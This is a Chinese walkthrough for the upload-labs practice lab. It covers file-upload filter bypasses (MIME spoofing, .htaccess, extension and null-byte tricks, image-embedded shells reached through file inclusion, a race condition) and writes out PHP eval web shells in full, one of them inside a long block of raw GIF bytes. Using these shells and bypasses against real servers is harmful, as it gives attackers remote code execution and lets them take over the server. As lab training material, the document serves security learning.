第一关：删除前端js校验

写一个一句话木马，命名为1.php

一句话木马

浏览上传

我们发现不可以上传，右键检查，依次点击

找到return checkFile()删掉，再上传

去看一下是否已经写入进去一句话木马

页面什么也没有，说明写入成功，去蚁剑连一下，连接成功

第二关：文件类型校验

我们上传1.php一句话木马抓包

把上方红框中的类型改为image/jpeg

放行后，查看是否将1.php写进去，也可以连接蚁剑查看

第三关：上传php同种类型的不同后缀

将我们的木马1.php写成1.php2或者1.php3或者1.php4等等上传

第四关：上传.htaccess配置文件

创建一个名为.htaccess的文件，内容输入AddType application/x-httpd-php .png

在创建一个名为1.png的文件，1.png文件里面是我们的一句话木马

先上传.htaccess后再上传1.png文件，再去查看是否上传成功

第五关：大小写判断

查看源码，发现没有大小转换的拦截

我们尝试把1.php改成1.Php再上传，在查看是否上传成功

第六关：空格绕过

我们抓包，把1.php后面加个空格在放行

再查看是否成功写入

第七关：点绕过

抓包

改完放行

查看是否写入成功

第八关：::$DATA绕过

查看源码，没有::$DATA拦截

抓包

放行查看是否写入成功（注：用hackbar，不要加::$DATA）

第九关：点空格点绕过

抓包

放行

查看是否写入成功

第十关：重复写绕过

抓包

放行查看是否写入成功

十一关：00截断绕过

这里我用ctfhub靶场的截断代替的

我们创建一个1.jpg的文件，里面写上我们的木马，然后开始上传抓包

下方两张图是更改数据包的前后对比

放行查看是否成功写入

十三关：文件包含图片马绕过

创建一个名为1.gif的文件，里面写我们的木马语句，在木马语句前面加上一个GIF89a

然后上传1.gif

右键打开新标签

再去访问http://172.16.1.140/upload-labs/include.php我们看一下这个源码

发现file是参数，我们在访问http://172.16.1.140/upload-labs/include.php?file=upload//9120241219173117.gif

再看看是否成功写进去

十四关：文件包含图片马绕过

十五关：文件包含图片马绕过

十四十五关可用十三关方法过

十六关：文件包含二次渲染专用图绕过

创建一个1.gif文件，里面放（注：这里的密码是zoe）

GIF89a  ?  乙覍寣XXXqCCC芵\耨聃貂櫃橯U{玅P:::()K铑詾怂虽滗欓殚妹脫摀V)('''後喑吵X\吽?嬜换猾逋5苘埭いNE.?H刎佝彀{{{剟?埭uuuiii识壴fa譅冲bbb啄?yg舴鬻蜩谑z?wjPCFf猫NRx楨J曜?嬺?##$<剎["嬗?;W?喾-<?php @eval($_POST['zoe']);?> !逊-褨IMp顶|
	郗6'疠?黢筱睈?"僬萚P=叩?=:铢枀d同y4=///nnnOOO祆鞛灋鳇蠍qqq焐1隍モ耛YPTz   !?   ,       們剠唶垑妺實帍悜挀敃枟槞殯湞灍牎ⅲぅΗī氨渤吹斗腹夯冀究懒旅呐魄壬仕掏蜗醒矣哉殖~僮鬯俎哕崧邁(噔旰r?Tc#
s~臌磝?f澡Cp??怜～~浯纫? &怷Aq?	奃呂蠂X g抌塺#o!?r?T贪仴?}痼 ?9%骾 €侭
q酣嘤泦}$鴣@艇?铧h癙蛄c 鴳€r乃撷餾枟6Ip劫R?€€5F腨? ?
A| ??騻(仼４?lXgE	 C嵟穭?N?(啤曦垹ws@U_?	纙扳?(铲~???h悺呧j?杴蒴硜械砓钃!斧r?B?N<?=pn??3肌豨剨忨€Z拿
??l?C?爯}?鉫燩Q珅?"豠呂?個Z釷d ?袥+T€諄,D儙7?敇U$袵-^釂b??B?Yy? b?R6鬭@ph0罵?爛A(4Z*?`@&ctF繠X=?	7霖@Xz驛o臞fc€"缉U??4?	v愢
隄(V3d#d)勹DE鐷g?鲠俋紕5儅I毻s?vo岏O€7
%缿
d懪郤棪Q%?園€O亇€ S*擱凟
J? X?垂勚e
+羸X?v?卯恼?虯臕5郧jr?Tcdp?	h m皡 0??? c7k1JtQCr英?]?9卯众籃??榼 #A
(  vTD聕鑼v儤逋|X) *
曅GJ癃,餎=u,?狋耆?@e栈t?午???逷9荁?讉?S	瘁!藒tYㄕ? 昹p?犙荺k意N{鈘? 脾8) ?類@?(李7%G鬛虵稦跧5茏袀i怴梥鈳鐽惲箩獸?畁奒p?哣掃赍G鏼5啹<+@O~埦?巢Q鮠U?訿霢*<@?
?蜣?鐄厀{革xe-P迖壬g3,?x?? L€ p?敄+o萫-?`D?€4   袄ヤ0k)叇n?0鞄wuJA?鍑絗鏜q繥 謬暅,l硓>P
榗(穒€秗i少?6??侤嘚B%丷?*H0
w4 貒*＂奄導墠<	怴篾謬?  櫁B6箁$]t	?€ 藽S釒孳厧瘖睵8m?`?M諑Mt?鱻]隴贍阄疲=AG銩褷? (?E~?[??爟痍? @
t %N悇灢?Z艕B1芇?.俑?*X
?9緲
燶/s笃sB鯠en?抔vxxS?I€!56溑€F()矺?#┠??? 弛?偝M*墟Mp A@饊仹K瘹@b扥tH€??B?l&澣05=]?K尅2€捲5Ots?擛?M?8? >???拌J儎奼
褖"???)P楠てA龉B-$`&4*(鞉⑷??+?郙s?騯瘍L ;礝膄b? *^個?X艭me儴 	4p肒$gXY?$筳-w罛!?b??(?r=羑6nc?牧H瓜
6P苐l?頧ㄘ屖.佃C?覲>
X]	@?┮槧Z聝臡p/k)s曡p'*@"鳞(j+蚭X莉UX鎯r @?嗕? P? T€己y[c?桋?LN║??殺cy?筗?燘惩?犎?? 	H >9+;寅歞褻幜aT2繮鈸爠q湶暥魚馛鰯箹|5蜎 %5U?,8?D&€醒?燘f?9燖(XYr:贌?怲??1擸e迸懠'?電嗳?亭癜"覤雠>喱?	p? 爄P趮?[6Dx齚H"v70?糐??膮d ?屃拸 ? ?｀訝F羷}(嘙???俢F	銴+峿W潔秡5痃睽 ?+?v;粫CE'摩猌 ?狧7C眆P*Y鷑厗扥@C憔??厶H迦ㄑ拖?梻W&詈JblX?P顳?疊P?fc4|1漶`2腏?t ?L?弆囆7m?仭蝍-@`€x溿q€V爛ij€/賦Mx3	殤?~鰐? 圬O!€x萲s #@啎?|? x?Yc?"w+龋K??燚仦翆谠^繟`L邜? €牰8hO{qF饐8? ?├?剙	E?╠毫T?H`t綪槒鏤鹿x粗礱?|?霡?
畦狆铱1	籿V黌蹺蝾Q慦?V` 诙?qp?0?€`?A	? 咐=h.N
捺傁尪W穫?-?(-v, B叿?+崱jp揄L緣% <庴
昝?d@_
@^瑓濂??缸f??@Tn祔缁	€D	0磥 0(AY? 幽a厄uCu3?v? d鱤,?u?厄Q日u缨Dh~ #謗CO1;灔7?(?-p€%鱚}@L?J??涹`5悠p羋\}`4Cd-PW?s  氄m$ Q/C#`BcLp! #lFU!?齻K??餑?Erh=攔 s繸G?喰K?%@%苾WP!2S?8?海U揤iYPP
?` (軻	€
#餰[b*P埓?殖(儬)?7?郵4D?\Tb<v?扌%F?"?gL姌醭3 ~8.?Ir壍q呩A-烛嫳?BM???朤 嵮XOq/`/櫬`$=!s呧@?X\莡s€Zo 鐚暌u?8?!X17}? 8戴_┴姀??w} B丗REF??Z酙紅0?Xgm?QW(鐝#?!??蚖&v$Cap?)@??泃〔&圩s@Fe45?=}0O鹓1v?0鉢0iFb?9蜽@%騃?€ウ	`Hs袽K倐€0?x#` *?C!:柞?#?晆)?Q0?0瑬晩YnB(??岫y恈-?靡w琣皥+ㄘ殥慒?p€5?柛槵?KD葾娪)$?€?n?歊<?w?ZQ3懕涷? (酘S?`P^2V?漧?+羑?>D.凱#* K蟩=J#啑0€J楒o??繺I憢€鳍淥?/?Y ?潒?5p傂皊?  n??GD?s1?C (醆rPvn?cAr`?h&熮R?@漏?JD企:謮唚q曆慦"!嶠à!%5嵴1]v戇悩]?/!汻耚?iv?>R[#*?@%/N?鋰
?0D堁a4%?P# %?EgD夰oK劊货?ぽ2id?媠Z?j丂藹?X 呰饀ct<駭淰FV?wvy  +PWp€>*%荣师?X	? ? #"喦P0dqP_$钓D惵??i檭鵔,G錦鯣扵"煋SCQЗG?X莲貋〗?逘*` ^畾-燙p-?第 Xa?﹫殅?l:5爧惊┚?Pr薂0,!C')
鄧臕?)?1%?*?`rr吚C4?}?dp\衃?? #Y?鞀類 d?]稯?a?? -??粕癉e唨@賭譐桊&门塩&郯q?Y爱?j?c? vP?鷃??$pt⒉黩*%(g5? 肘a噣Q1\?p6k硆?c?x肖??`?!喆It乺xc? F?!啇褠寬KX?A=]膻?b貏碤  `裂%q%*$硉諭昩??22规瀴U?@?袱杽?葊7薨hpEC???0&岝 瞩櫆C]?婩咺bHF枱?05欼簛k#:勄癶瓡 ?D?`c`,寯????/ 5`? 3€<g謻嚑庞L吋ほ沢嵗€o儛t刉T0<#@-皢U襲垔磩艱~pG?@!b?録jd齛铬妤桶( 獌? |4&濬q#=Q毬0o3k?^? ?o4:;;雕u?<,痒ツ繥["^&QGU1,s1/$?ZaH銝捞?@%汥GU襒”f壝
?霣"羲}K?4A琜啧
鄘
? 537T#攄洠?j馾?, 凘o諂觉把q嚺??血拎k??茩( 鏦Y€ ?g?邏否7	袕矪N0(?/[S€屆瞅
撩綪?€i"cL 窇T衯3 ? ?7zaUC p!C*? 珸慙?縒瘭勡(^B$?鍣Sx?B" x遐5`
?`夓?蜏人尲??? ?挗)抌 Q腷篢辶a(`Y鄓.p€o纁舨h栣5#S?縶嚕餳0"圈C?T+'唈1#€r?7唓JWXp?d粷ab,?褋{宓莧?Q?MtC羴 .酂唨??p_?? 3p?弲?2嵜?B蟣;?郞毁Zv+h	纎?^讖轅点lh覵莸4?€?鎠q铕噣??g瑶0杘N靂?-~P<牬mM?@%珌识?擛熰孆t?颗c使az?m?F鵼資?蝒檧硆?砍耭▆	j鈉苴伝Je蹠@t哦}?跒煭蹜€欫筵?2E軖p?嗆?]浲軐€tt]蠱?馉覯蒡?5泌??蛰迧癗?蓼?趚揶4蓼唤?6莛m?逥?????僲ILl党W∕?N佫y?薨啀?乺? (?罀`5鹎凗bV錥?8映!K窆预??峠?C??_`〢o惼Lw蝹?瞰僚A).祚nQ?GH?郞橥緘p糏瞰
氥躊up?t5) lPW.?塾禲薨KBM?鳳?@O5y`P??脪﹐~ま孀0?癬骃汋Y]傠鑠?檏A(??綜?aY?辁﹋(?斠
g劋i歑??)?ⅷd%?5?%勱T进闓ZR?鐓?魛枇4 ? c€T??@[q~?i*錁	枸蜑旸6丫骟&?榯2?0毘睑箚轓柚??Y[T?o狀蓓.熳@?孾D?Q脟镆馆F@
褠PL冸接E?莃鹧賑d?j!睿I暷x?
Y醲P艊匮??殛€Y萕忺g歔P 沘 \无榷遐摠t="酫???/?鶵炤€秎瓨贰?A"鄺'9?`鬺?<€魿?蒇[楃bPwL\C C)泐坌?f?v纼?9?Z?P侽O狏厄歟?哈4坺秸辀9悅y\k9?0T?F?>0e@燨C?b(蟸3 ?zPp?盌B?	>鲷偮"S磬~?C?爔!嗶窮(霯9??f)碆c?????燂麪?:p!窇汒j$5`}?跢?Q1z慰*7Pr?罬?蛹乢97. 槛?K=€`譿徵鱳垬ǜ蓉桫)	I夥宴D?觅轾?罛嬖稱圸堶肿Z?+;﨣[k?TF裑Vr雵行?恷Qb?鹦PcQ8Ym}崫崢郍P\?:>戲RCチ翡泱斻鰽曱V)専?+︺誎?|.鶳筽!橞f}2 菳5m+Z碫罯?o4?扴?H鸂耨甡r,荣3f>-9r?
&S郻劚?&^<?)仴呗厊?艞>l? 鋟Sχ璡Q?褿 2焥Z? 犩酆?罯蜭洖倢0€茤,i|\?癭a鈖鐦>-喲C瘤璄X H~耐?睨柣疗
e紙?5?}FH倐}?霸抢硭揝郪▊?e蕗螢A?A祶蔪禤纳?藧严?"瘱j脤
\蠵(婓?<餝蠨
虥嬏;?/鳣漸n?祋@	啀 A!孭 嫜塛喌箩3LS葇袅W亗lp?(鎰f蹃.蔇@3o鬌謝Y淩HN車??  ?*|`?qd??L@?蛟PNヨIT协鮞桖ㄐ?
?€Ja}恑H彄cn鳡侭`鈕泡鍳 蒑Iex裀?NjI(- @蓳O-G*? _歫FR?}i,?T
p剪 摷捧纗N盶?懺G練B夊S s癰 p卲9?	L害\篳K-d椓_蛗AF獇夿J?  €€髁觎a?hP?崹纅鑷 }`i?汪?~T€oVP?﹋N}k?Hr‖崁Y諃#*s? q隦鶣3蹅k?9怜椵V+h熳_s,餏o猣?3辣埊J怑
+攢PB?瑦y?朗+ \尡弃堂憛 累m$(视???阪*竊???俩L鼏DP#鼿!喗蛯€c椺q T[M%Jt憗D[XA	奥a噊耙€啜T@?v齿?fi絆铆甗KwUK沚
Q?锣丈甭?5G?刺!姗p倮mS轍!`/L楃?#?亗hD況Hx綈鄯??m? A	伧 L`x?嚅?(?锝優?兟4Gv槗pYq懤?P茑g,?€ 
P€砇???hC皃鵕?篞屧?A兠}?檕U?] G
%@?/hai ?€a 7!8@?zbL耹A側鶃5囫C?笀B唉(Zb\p!x
b樌	N??(uaN?蠵獒r?胠11№C5壤s
)"???ざb√鄡I  ^?	塘癪夂D?,n?0B?i €  銴 ZX`1膬	棽?;眈倄h??AJMx樌? ?d郹#x? Z爛?H€? €LdRQ$癅	繦譗A 
悁鉦鯋窣Ap鑔|X?檋`V??/?磞&b癞? 
埫bZ憗\?PcL  蠢 椞?~??€[
?囏D誓]◆C仙G?@@圽塭sDG<
1荤€=??r谸7l .Y蔍V ??'旮楼鵄E?8B迎xs杫"E 太樏禂?虌
-釜u缞8孍`??<甡Q?j嚵奟n?AC宇1乷?Q噦 N 什蜵涀(?T@h永? P倒嵢軞?u色Z9T??$ <榃.?&?葞>嘞甽4,豪殤=?r犅碬€硤@吇ZだKU"}?T嘈
*(唷k黁俧€萵EO襇lln[划醒X聬I芴鶤V?蘹ts疌?8P蠳抁]YL嗪爹玍* 楔VN粫??理?魳轇Ll	怅??蹳 tsS狳?Xl~c??LK璙
r旫?橧oq3飚?g?濪 P?糝穆(瑼磱??獣犤€甃`c`?|
s邙厴€俵?-?z]?"Dd}郃O<1>R<?@頱釼牷`>饋??aK@I僙?繮奡5,nN?4`榙鞢森婓婋庢?婷? m?ㄠ叺?.X!X0喦V[G沣
?对K瘶\嵮姍`?s?a裾↖輱H縪9皞8R€?@謀蚯凙F閆QF蕩玠2?\y?嗬燚Ln????X罯PF€?剚讴↖<稹箚?型蓝cSV冊F+@闏炆]n卹胳^颪醈?D??€r竝纏3x?t鄺^? 0?jJP[蔦4熇(祍馃癇hM?{躿6?€s霤pａq励,氻	q袄
J?Z迅B劻桓?猲??F佡??榏\r瀞A堳 ?:xp椄9鄆坃9g J?>w螃?)?茸橅腗?O@} 纙i蟼?彜D谍V.Sb趑? w?掐y癧u◆n瘄B1€??胓?Q?r缷躯?宝?奱鴭9F踎s?D顾B?&袑? 飠框瀧`=萐P^V?詀鉜0|茸h&琄?棺?t ?4#'v
4/?@发匬€N\?F覹z辗w}PX~穪珸6SZ??9衶?*郖?吼x*?Z0?4谱vd5c郩ヒ%s`?€Dwz槪€囸9效0Ha皁?9€*?:p丂W傱嘢? 
鈢F鏵叚p錠€78c:秲囆=绵.燚刐?:?Lp~|卣d?34鼦%颜  E" B?喻i7q?50?唶`!?}0Nw唴?謘S壑剛?GpF#癭CG堜?B?媥鱌'8p揦(8?q?K秎ㄐp翮 F0P拠G c僗姦Gl:▕0(@c????5pS迺磥&眕a]2|?|嬹p猫wE鱵莤KbDe?涾??硏i阊k盄 v菎荑崵庛fn?(澍?僽嬰x 枹3曾?悈`5P忲鑠鴺徛咷┓凎€ `f?G惄慈+承CG饜鄹?懻梼箖	p
鍖)^9?d?洏椻 瀀捇貕9??掆?8sj2y 1#rF6# Q$4乐= |<蓫`A^)izW?圱??尅?2e8穊婦/?  `屄? ?`昘y?習4}W擭BG?% ;疿枮??(@oゞz6nW?t?倄楘Hl?栶1邌騁/b剛 ?M? ?/厾?袠?lW皳?4選椻菵E?恦?筲/?o? ?椸%?*?償
黵)鏆疘??I@檹€}GG敧?z" K8|??.燫誥U錮啈蠭$??澰I濚閾釼欎?埱H @ 瑎d稅摥a.諄皭諵{5塱q繷?c癵鲏燌ye?禮?搥荴	楌霐qa ?03?揬覕绷C?e?姡z?錐l[贌?XB庽1rU)??樀0殣g?0慤N`}0}殻嵣i^?6X? hr屰S#衏窅]G飮
y?~0S肖?
?扪yー]P"?括跇?o贌?ps??溟k獅紁S?R0z t:橆鉃绷f
?zR*&?滷蓾ac?Z戇﹢疳.F::鄕鹤 k?@?`L盇.讟N}?I w 6P灦?*?枃f狧2
猗??C?呅?€;?M?F怷瞐扰塤瓞袣ｗi怔渾}X獫匄?燼X	取c穩頖Ch?肖?V癝I 婣~z鯶;?j€瓪`箞q?駂旆)?V?; k0?4墏TP?栤j?[▏慮H堚? <q?鴲O??睍柃ずE#鄷??	€ F`"瓞] l儶瘻f^K}喔g}?軍 ?Z?磖K銘? ]€?P謬殆y璠纱#?/a谤€扩満繁@G觝+?€z2hN5?WJz嬎?4?尛J&??fsz?q?R€??７2幊冩(9?ê€挴聘埛1蔤t+牖?p??墾郠F鶻U唚藡??(?c藪[咥鑲仉D??陛??稲hV墾惇昊2鏄DWn=?槱娷P"{?t?D@經亮j掣劭輯臔M诵紽箒rG屰g?cC'cK?萿? utb2坏? 郢?;嗔輯║aq?o饅╬	Y?Zn8FG??c?@l?8錁朆＊ p管???癌?评3?f裍答k浥脎椩%#`M?j蹳梆 R惪2;聟?2 20Ki- 橅鍄c ?H7石?F蕠#〉僸?v S嗳k 聇\礼s?徜?1多
U茫胎錟?0hF Zf?e噮敖R?鵎舜?q ?"9i匠p$?贴? 苗G釖鍙!S荁<统忻:So0NBWf(?3H酞W@扐!D柾?g"k?C芪? 獈€B崾铝zF虘;-秀7	?r@? ] 9??惘汀????硌鵳	#P泷??W溇*龤?`Fぱ?些)?薑|嗐! 韎d`湶`)y訟?`險訬]厶旍?嬨tR?7?詹  啥鷟e啮pYa?\b玔伩苂?絟 織Q?$鄲唜誂m^#?骒??`??~ 蚅蚾?F袨k=~溫巠?諸a)∷佈発尒摳颅??0?趝?牓裶伷'?2;硲蘯 ?瓻鄢 c üm裛a4?(?%?S捌腯?倁森芴-澪}z錻贓yU溦S€貲H Uc`;昀Ｍ纔6?]?s<\q?q?<cE]	\"冼??[?f欣-藼?
?q	 釀b谺 0? B?輭 霰逤Eez;庹a豙p'p 0€崂?鄷TE?V???€? '?抓=癮)aw??K~{€?^?腑1螞|錤1犣Ra2`=5`{p \庒X?獷蚭c欁e $ €藀  
?i鱄"? {厘噱u~瑽J潋?1檠t] ?厼掕B`€n?@?  鐜铊0犫蛦*Gx?判?顠 +0?葔ｄ戢铌p~馑~?绨五j芯?结闹kx炵9釢?Z ?性H欹~飕剔煜黼韂N^i}﨨貫?砘郘+P璁ｈ祁婢汨铎晡?_鹞?蚽k遑炵桜z?P蕻? 钋M?铌快蝞?/蜢毋}啾绿餙+玊巆髮?繦<鸋[p?锺??象韼)]胴?趪腚呇?P狅磽8鋷???/鮏襄?澹籆铕維.张R( *嘚霣愱??O鮧唧%蚵錄吶獔
锱??%鰩D阥??霄兛? 
_鐮?a觉?0?B $?梨髟?瘅\駝稆勶钤>蔠钝s?R淵  媱馿 鯚O麨n0?炯?掚饄綹e鐰?pl麤宵灴鉣€?}璬J锺?嫳[ ??- c唪f痫溸焱o??}zU?蚖鏬P騷	`栂莪圜{們剠唶垑?55??|摂晼棙?G}v~~、￥ウЖ┆?焴T}]00{f}o 緹 
T5}荁j?祳醒矣詤?}K挋哙?}3燓殛耄?c}f秲乌c%慨$s3o侨?sv郱祪**葓=m=8剾鴯脪>q€b潜c荗F袅饘?7莊h瑗a儕茙u1超YA?sdx摿	 罰忧丏奌+Y煊€繤廝＂鶷釤檼&}?覈J +?杜寷佄t猐媹?€?徭DP??9?)?}2$x*祊酧vd輁$W.W€}j榚扒V稑s?W钴蟯鬈萑呔9\??冒=~`拳C孨槈笶? ?f帗!g ?+燓|磋=5L?壸背?揄?zc n?耋袑飰患絩犳痬砢羣婗臭憖]?T?蠤顶'歱?(峲旃玎\祏?Y詗逥蹰鰽uH?$?酈?h?&鳡{敃(HAB<b邊醦`D?驷幁?@[<w鈵;渐鈯?
寎\1#?舝?v?5孒鋿?垽兺筯?]???l覈
TV檫'd@鄔\謎
]_?D媌Z??瀴I氫感趠2肏犯彖F*椁擵
㎡y2梙?i鯀*戗J闞q
[  ;<?php phpinfo();?>

上传

访问一下include.php看下参数，参数是file

再在include.php后面跟上?file=upload/7216.gif

在查看是否成功写入一句话木马

十七关：抓包爆破条件竞争

创建一个1.php文件，里面放

<?php fputs(fopen('webshell.php','w'),'<?php @eval($_POST["cmd"])?>'); ?>

这个木马文件，去上传抓包

右键发送到攻击模块（Intruder）

一直点刷新

直到出现了webshell.php在停下

再去访问一下看看是否成功写入

第十八关：上传二次渲染的图片马 文件包含漏洞

和十六关相同

第十九关：文件名命名规范

创建一个名为1.jpg的文件，里面写我们的一句话木马

浏览，选中1.jpg

重命名为1.php.或者其他的文件名绕过方式，然后上传

在检查一下是否成功将文件写入

以上就是upload-labs靶场的攻略！！！